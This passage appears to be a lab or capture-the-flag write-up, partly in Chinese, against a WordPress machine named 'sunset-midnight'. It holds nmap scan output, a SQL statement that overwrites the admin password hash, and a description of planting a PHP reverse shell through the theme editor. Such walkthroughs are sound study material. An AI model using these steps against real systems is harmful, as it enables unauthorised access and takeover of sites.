sudo nmap --min-rate 10000 -p- 192.168.162.147 Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 11:24 CST Nmap scan report for 192.168.162.147 Host is up (0.00046s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 3306/tcp open mysql MAC Address: 00:0C:29:2C:C9:48 (VMware)
sudo nmap -sT -sV -sC -O -p22,80,3306 192.168.162.147 Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 11:25 CST Nmap scan report for 192.168.162.147 Host is up (0.00046s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 9c:fe:0b:8b:8d:15:e7:72:7e:3c:23:e5:86:55:51:2d (RSA) | 256 fe:eb:ef:5d:40:e7:06:67:9b:63:67:f8:d9:7e:d3:e2 (ECDSA) |_ 256 35:83:68:2c:33:8b:b4:6c:24:21:20:0d:52:ed:cd:16 (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) | http-robots.txt: 1 disallowed entry |_/wp-admin/ |_http-title: Did not follow redirect to http://sunset-midnight/ |_http-server-header: Apache/2.4.38 (Debian) 3306/tcp open mysql MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1 | mysql-info: | Protocol: 10 | Version: 5.5.5-10.3.22-MariaDB-0+deb10u1 | Thread ID: 16 | Capabilities flags: 63486 | Some Capabilities: FoundRows, LongColumnFlag, InteractiveClient, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, SupportsTransactions, Speaks41ProtocolOld, IgnoreSigpipes, Speaks41ProtocolNew, Support41Auth, ODBCClient, SupportsCompression, ConnectWithDatabase, DontAllowDatabaseTableColumn, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins | Status: Autocommit | Salt: q>#3vy{#6$SU12HSHN2M |_ Auth Plugin Name: mysql_native_password MAC Address: 00:0C:29:2C:C9:48 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
sudo nmap --script=vuln -p22,80,3306 192.168.162.147 [sudo] mikannse 的密码: Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 11:25 CST Nmap scan report for 192.168.162.147 Host is up (0.00038s latency).
PORT STATE SERVICE 22/tcp open ssh 80/tcp open http | http-wordpress-users: | Username found: admin |_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit' |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: | /blog/: Blog | /wp-login.php: Possible admin folder | /wp-json: Possible admin folder | /robots.txt: Robots file | /readme.html: Wordpress version: 2 | /feed/: Wordpress version: 5.4.2 | /wp-includes/images/rss.png: Wordpress version 2.2 found. | /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found. | /wp-includes/images/blank.gif: Wordpress version 2.6 found. | /wp-includes/js/comment-reply.js: Wordpress version 2.7 found. | /wp-login.php: Wordpress login page. | /wp-admin/upgrade.php: Wordpress login page. | /readme.html: Interesting, a readme. | /0/: Potentially interesting folder | /contact/: Potentially interesting folder |_ /home/: Potentially interesting folder 3306/tcp open mysql |_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug) MAC Address: 00:0C:29:2C:C9:48 (VMware)
UPDATE wp_users SET user_pass="e10adc3949ba59abbe56e057f20f883e" WHERE ID=1;
Getshell
成功登录,接下来就是老套路了,通过外观里的主题编辑来更改index.php为PHP反弹shell。但是更新的时候报错:Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.
